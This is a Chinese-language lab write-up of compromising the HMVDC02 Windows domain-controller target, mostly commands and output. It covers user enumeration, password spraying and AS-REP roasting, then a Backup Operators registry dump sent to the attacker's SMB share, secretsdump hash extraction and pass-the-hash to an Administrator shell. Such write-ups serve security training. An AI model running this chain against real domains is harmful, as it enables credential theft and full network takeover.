打靶记录(一一九)之HMVDC02

virtualbox导入.ova文件启动后会报”Failed to load the NVRAM store from the file”的错，更改虚拟机名称后能够正常启动

所渗透的靶机IP为192.168.56.126

端口扫描

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.126                                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-19 06:54 UTC
Nmap scan report for 192.168.56.126 (192.168.56.126)
Host is up (0.00033s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49670/tcp open  unknown
49676/tcp open  unknown
49689/tcp open  unknown
49709/tcp open  unknown
MAC Address: 08:00:27:4C:2D:6C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sT -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-19 06:59 UTC
Nmap scan report for 192.168.56.126 (192.168.56.126)
Host is up (0.00041s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-19 21:59:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 08:00:27:4C:2D:6C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4c:2d:6c (Oracle VirtualBox virtual NIC)
|_clock-skew: 14h59m54s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-19T21:59:51
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.63 seconds

kerbrute

没有匿名的smb共享权限，目前也没有任何凭证。只能盲跑用户字典

┌──(mikannse㉿kali)-[~/桌面]
└─$ kerbrute userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 192.168.56.126 -d soupedecode.local   

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/19/24 - Ronnie Flathers @ropnop

2024/07/19 07:12:51 >  Using KDC(s):
2024/07/19 07:12:51 >   192.168.56.126:88

2024/07/19 07:12:51 >  [+] VALID USERNAME:       charlie@soupedecode.local
2024/07/19 07:12:51 >  [+] VALID USERNAME:       Charlie@soupedecode.local
2024/07/19 07:12:51 >  [+] VALID USERNAME:       administrator@soupedecode.local
2024/07/19 07:12:52 >  [+] VALID USERNAME:       Administrator@soupedecode.local
2024/07/19 07:12:52 >  [+] VALID USERNAME:       CHARLIE@soupedecode.local
2024/07/19 07:13:55 >  [+] VALID USERNAME:       wreed11@soupedecode.local
2024/07/19 07:16:07 >  [+] VALID USERNAME:       printserver@soupedecode.local
2024/07/19 07:18:13 >  [+] VALID USERNAME:       kleo2@soupedecode.local
2024/07/19 07:20:37 >  [+] VALID USERNAME:       dc01@soupedecode.local
2024/07/19 07:23:06 >  [+] VALID USERNAME:       ChArLiE@soupedecode.local
2024/07/19 07:23:07 >  [+] VALID USERNAME:       CHarlie@soupedecode.local
2024/07/19 07:23:30 >  Done! Tested 8295455 usernames (11 valid) in 638.858 seconds

存在一个charlie用户，用他搜寻一下其他用户信息

┌──(mikannse㉿kali)-[~/桌面]
└─$ lookupsid.py 'soupedecode.local/charlie@192.168.56.126'       
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

将用户名保存成字典

with open('user.txt','r') as file1:
    data=file1.read()
lines=data.splitlines()
with open('username.txt','w') as file2:
    for line in lines:
        list=line.split()
        username=list[1][12:]
        file2.write(username+'\n')
print('Done')

爆破smb

┌──(mikannse㉿kali)-[~/桌面]
└─$ crackmapexec smb 192.168.56.126 -u username.txt -p username.txt --continue-on-success --no-bruteforce >result

charlie用户存在弱口令，但仍然没有可以访问的共享

GetUserSPNs.py也没能有结果

GetNPUser

使用getNPuser扫描一下没有开启预验证的的域内用户，可以用其哈希爆破

┌──(mikannse㉿kali)-[~/桌面]
└─$ GetNPUsers.py soupedecode.local/ -dc-ip 192.168.56.126 -usersfile username.txt -no-pass -request >hash

┌──(mikannse㉿kali)-[~/桌面]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash              
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
internet         ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)     
1g 0:00:00:00 DONE (2024-07-19 07:39) 100.0g/s 102400p/s 102400c/s 102400C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

得到凭证zximena448:internet，但是evil-winrm无法连接上，也许没有开启远程权限

进行一个域内的信息搜集

┌──(mikannse㉿kali)-[~/桌面]
└─$ ldapdomaindump soupedecode.local -u 'soupedecode.local\zximena448' -p 'internet'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

在domain-user-group中发现zximena448用户有DONT_REQ_PREAUTH，所以能够爆破hash,除此之外这个用户还在Backup Operators组

根据 https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#backup-operators

这个用户组有访问文件系统的权限，可以尝试窃取NTDS.dit数据库，虽然可以使用ntdsutil或者diskshadow来转存注册表，但是目前无法拿到shell

根据这个更改过的impacket工具reg.py https://github.com/horizon3ai/backup_dc_registry

能够实现远程转存注册表，需要先在本地开启一个SMB共享用来保存

┌──(mikannse㉿kali)-[~/桌面]
└─$ smbserver.py kali /tmp/smb/ -smb2support                                          
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

┌──(mikannse㉿kali)-[~/桌面/tools]
└─$ python reg.py "soupedecode.local"/"zximena448":"internet"@192.168.56.126 backup -p '\\192.168.56.102\kali'
Impacket v0.11.0 - Copyright 2023 Fortra

Dumping SAM hive to \\192.168.56.102\kali\SAM
Dumping SYSTEM hive to \\192.168.56.102\kali\SYSTEM
Dumping SECURITY hive to \\192.168.56.102\kali\SECURITY

secretsdump

使用secretsdump转存成hash

┌──(mikannse㉿kali)-[/tmp/smb]
└─$ secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

非常不幸运的是，这三个用户都不能通过evil-winrm来哈希传递

当加入security时，出现了新的内容(PS:因为security中存储的是域用户的凭证，如果不加是获取本地用户)

┌──(mikannse㉿kali)-[/tmp/smb]
└─$ secretsdump.py -sam SAM -system SYSTEM LOCAL                         
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 
                                                                                                                              
┌──(mikannse㉿kali)-[/tmp/smb]
└─$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:6561b8e13f5d352a61ce8974be7a4aadb951781e7d34be4431978d3b2eaf843d90668b98f81f1a9d523d85c377a7d701f62319824491a15e2e936c71f4c04b8471847ccf9835177d71430b56806eda58f5282c1e3d2aa9eb925b112ec85f6101664420817836b70e96f93638f46b69087eafb463f877947b2fb3644d0767d169c40fc3eb175a5e463751327312195584dfbbdf2f1e83ef24b3182acfd1a00bcfb31bbb4e8b16f11a4a34c125857bbc0e644a64f13fe32875bd8c3bed728450514e1751068fb1b615187029950f31c94f1514867f7622c461b715c4275b00e385d2196c8ba4f138463170870a0298bd63
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9e14f65e0038ea6c4eed5273974c2bfc
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM 
 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c../...
 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU>...!.
 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c.
 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up... 

Hash传递

得到一条域管理员hash:9e14f65e0038ea6c4eed5273974c2bfc

┌──(mikannse㉿kali)-[~/桌面]
└─$ crackmapexec smb 192.168.56.126 -u username.txt -H '9e14f65e0038ea6c4eed5273974c2bfc'

得到是DC01$用户的哈希,再次进行secretsdump

┌──(mikannse㉿kali)-[~/桌面]
└─$ secretsdump.py soupedecode.local/'DC01$'@soupedecode.local -hashes ':9e14f65e0038ea6c4eed5273974c2bfc'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
soupedecode.local\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::
soupedecode.local\kleo2:1105:aad3b435b51404eeaad3b435b51404ee:bda63615bc51724865a0cd0b4fd9ec14:::
soupedecode.local\eyara3:1106:aad3b435b51404eeaad3b435b51404ee:68e34c259878fd6a31c85cbea32ac671:::
soupedecode.local\pquinn4:1107:aad3b435b51404eeaad3b435b51404ee:92cdedd79a2fe7cbc8c55826b0ff2d54:::
...

得到admin域用户的哈希，再次传递,拿到admin的shell

┌──(mikannse㉿kali)-[~/桌面]
└─$ evil-winrm -i soupedecode.local -u 'Administrator' -H '8982babd4da89d33210779a6c5b078bd'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                     
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

碎碎念

这台的路径比上台稍微复杂一些，backup operator用户的远程利用稍微有些困难，以及后面转存数据库后的security利用那块暂时还不是很明白